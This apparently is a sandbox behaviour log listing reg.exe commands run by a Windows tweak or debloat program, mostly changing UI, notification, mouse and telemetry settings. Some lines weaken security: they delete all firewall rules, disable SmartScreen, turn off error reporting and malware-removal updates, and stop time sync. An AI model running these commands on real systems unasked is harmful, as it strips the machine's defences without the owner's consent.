        Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_EFSEFeatureFlags" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3968
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\ApplicationManagement\AllowGameDVR" /v "value" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Themes" /v "ThemeChangesDesktopIcons" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2784
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Themes" /v "ThemeChangesMousePointers" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4764
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3736
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SystemPaneSuggestionsEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4560
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSyncProviderNotifications" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2992
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4408
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "RotatingLockScreenEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:984
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "RotatingLockScreenOverlayEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2588
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-310093Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4864
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-314563Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4448
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338387Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3372
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338388Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4688
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338389Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2520
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338389Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1864
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338393Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2260
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-353698Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:820
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisallowShaking" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1652
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "NoUseStoreOpenWith" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2900
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4552
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1844
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4612
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableActivityFeed" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4380
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d "2" /f
        8⤵
        
        PID:4928
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1772
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3056
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Desktop" /v "MenuShowDelay" /t REG_SZ /d "0" /f
        8⤵
        
        PID:4632
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "NoNewAppAlert" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2592
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2732
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1916
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoTileApplicationNotification" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1424
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "HidePeopleBar" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2420
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Shell\ActionCenter\Quick Actions" /v "PinnedQuickActionSlotCount" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4548
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BingSearchEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3812
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:748
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "CortanaConsent" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4300
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "HoverSelectDesktops" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1176
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v "TaskbarCapacity" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1376
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Desktop" /v "JPEGImportQuality" /t REG_DWORD /d "256" /f
        8⤵
        
        PID:4344
        
        C:\Windows\system32\reg.exe
        
        Reg.exe delete "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags" /f
        8⤵
        Modifies registry class
        
        PID:1364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell" /v "FolderType" /t REG_SZ /d "NotSpecified" /f
        8⤵
        Modifies registry class
        
        PID:2096
        
        C:\Windows\system32\reg.exe
        
        Reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{0DB7E03F-FC29-4DC6-9020-FF41B59E513A}" /f
        8⤵
        
        PID:3120
        
        C:\Windows\system32\reg.exe
        
        Reg.exe delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{0DB7E03F-FC29-4DC6-9020-FF41B59E513A}" /f
        8⤵
        
        PID:3920
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCR\WOW6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder" /v "Attributes" /t REG_DWORD /d "2962489444" /f
        8⤵
        Modifies registry class
        
        PID:216
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCR\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder" /v "Attributes" /t REG_DWORD /d "2962489444" /f
        8⤵
        Modifies registry class
        
        PID:5112
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackDocs" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4828
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableSearchBoxSuggestions" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1716
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCR\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" /v "System.IsPinnedToNameSpaceTree" /t REG_DWORD /d "0" /f
        8⤵
        Modifies registry class
        
        PID:3196
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v "AutoShareWks" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3984
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\WindowsStore" /v "AutoDownload" /t REG_DWORD /d "2" /f
        8⤵
        
        PID:3780
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4436
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "link" /t REG_BINARY /d "00000000" /f
        8⤵
        
        PID:2008
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Mozilla\Firefox" /v "DisableAppUpdate" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:3772
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseSensitivity" /t REG_SZ /d "10" /f
        8⤵
        
        PID:544
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKU\.DEFAULT\Control Panel\Mouse" /v "MouseHoverTime" /t REG_SZ /d "0" /f
        8⤵
        Modifies data under HKEY_USERS
        
        PID:4528
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKU\.DEFAULT\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f
        8⤵
        Modifies data under HKEY_USERS
        
        PID:540
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKU\.DEFAULT\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f
        8⤵
        Modifies data under HKEY_USERS
        
        PID:2884
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKU\.DEFAULT\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f
        8⤵
        Modifies data under HKEY_USERS
        
        PID:2200
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3648
        
        C:\Windows\system32\reg.exe
        
        Reg.exe delete "HKCU\SOFTWARE\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /f
        8⤵
        
        PID:2352
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\MouseKeys" /v "Flags" /t REG_SZ /d "186" /f
        8⤵
        
        PID:3168
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\MouseKeys" /v "MaximumSpeed" /t REG_SZ /d "40" /f
        8⤵
        
        PID:2808
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Accessibility\MouseKeys" /v "TimeToMaximumSpeed" /t REG_SZ /d "3000" /f
        8⤵
        
        PID:2124
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\W32Time\Parameters" /v "Type" /t REG_SZ /d "NoSync" /f
        8⤵
        
        PID:2104
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d "4282927692" /f
        8⤵
        
        PID:4260
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v "AccentColorMenu" /t REG_DWORD /d "4282927692" /f
        8⤵
        
        PID:2396
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v "StartColorMenu" /t REG_DWORD /d "4281546038" /f
        8⤵
        
        PID:1652
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v "AccentPalette" /t REG_BINARY /d "9b9a9900848381006d6b6a004c4a4800363533002625240019191900107c1000" /f
        8⤵
        
        PID:2456
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d "4282927692" /f
        8⤵
        
        PID:4576
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "ColorizationColor" /t REG_DWORD /d "3293334088" /f
        8⤵
        
        PID:1392
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "ColorizationAfterglow" /t REG_DWORD /d "3293334088" /f
        8⤵
        
        PID:4380
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "EnableTransparency" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1016
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3996
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableActivityFeed" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3524
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "PublishUserActivities" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1416
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "UploadUserActivities" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1096
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "DisableLogonBackgroundImage" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1424
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "DisableAcrylicBackgroundOnLogon" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2420
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "UseDefaultTile" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4548
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarBadges" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3812
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoStartMenuMorePrograms" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:748
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoStartMenuMorePrograms" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4300
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "HideRecentlyAddedApps" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1176
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideRecentlyAddedApps" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1376
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4344
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v "LegacyDefaultPrinterMode" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Desktop" /v "MouseWheelRouting" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2096
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\TabletTip\1.7" /v "EnableTextPrediction" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3120
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\TabletTip\1.7" /v "EnablePredictionSpaceInsertion" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3920
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\TabletTip\1.7" /v "EnableDoubleTapSpace" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:216
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Shell\USB" /v "NotifyOnUsbErrors" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:5112
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "VirtualDesktopTaskbarFilter" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1632
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "VirtualDesktopAltTabFilter" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2380
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Keyboard Layout\Toggle" /v "Language Hotkey" /t REG_SZ /d "3" /f
        8⤵
        
        PID:4372
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Keyboard Layout\Toggle" /v "Hotkey" /t REG_SZ /d "3" /f
        8⤵
        
        PID:880
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Keyboard Layout\Toggle" /v "Layout Hotkey" /t REG_SZ /d "3" /f
        8⤵
        
        PID:3484
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\CTF\LangBar" /v "ShowStatus" /t REG_DWORD /d "3" /f
        8⤵
        
        PID:2984
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\CTF\LangBar" /v "ExtraIconsOnMinimized" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4752
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\CTF\LangBar" /v "Transparency" /t REG_DWORD /d "255" /f
        8⤵
        
        PID:4764
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\CTF\LangBar" /v "Label" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4268
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FlyoutMenuSettings" /v "ShowSleepOption" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2268
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FlyoutMenuSettings" /v "ShowLockOption" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:408
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Multimedia\Audio" /v "UserDuckingPreference" /t REG_DWORD /d "3" /f
        8⤵
        
        PID:864
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f
        8⤵
        
        PID:2616
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f
        8⤵
        
        PID:4168
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f
        8⤵
        
        PID:4452
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "AppStarting" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:4448
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "Arrow" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:3372
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "ContactVisualization" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1992
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "Crosshair" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:2328
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "GestureVisualization" /t REG_DWORD /d "31" /f
        8⤵
        
        PID:4536
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "Hand" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:4420
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "Help" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:2428
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "IBeam" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:4552
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "No" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:4540
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "NWPen" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:4328
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "Scheme Source" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1392
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "SizeAll" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:3852
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "SizeNESW" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:3728
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "SizeNS" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:2512
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "SizeNWSE" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:3996
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "SizeWE" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:2592
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "UpArrow" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:2072
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "Wait" /t REG_EXPAND_SZ /d "" /f
        8⤵
        
        PID:4416
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /ve /t REG_SZ /d "" /f
        8⤵
        
        PID:1916
        
        C:\Windows\system32\reg.exe
        
        Reg.exe delete "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules" /f
        8⤵
        Modifies firewall policy service
        
        PID:4852
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules" /f
        8⤵
        Modifies firewall policy service
        
        PID:3412
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\phoneCall" /v "Value" /t REG_SZ /d "Deny" /f
        8⤵
        
        PID:3748
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v "HwSchMode" /t REG_DWORD /d "2" /f
        8⤵
        
        PID:3000
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_NOTIFICATION_SOUND" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4468
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewymicrosoft.windows.immersivecontrolpanel" /v "Enabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2744
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4832
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v "LockScreenToastEnabled" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2296
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3476
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Bluetooth" /v "QuickPair" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2284
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3980
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "ContactVisualization" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2088
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Control Panel\Cursors" /v "GestureVisualization" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:1008
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\StoragePolicy" /v "04" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4392
        
        C:\Windows\system32\reg.exe
        
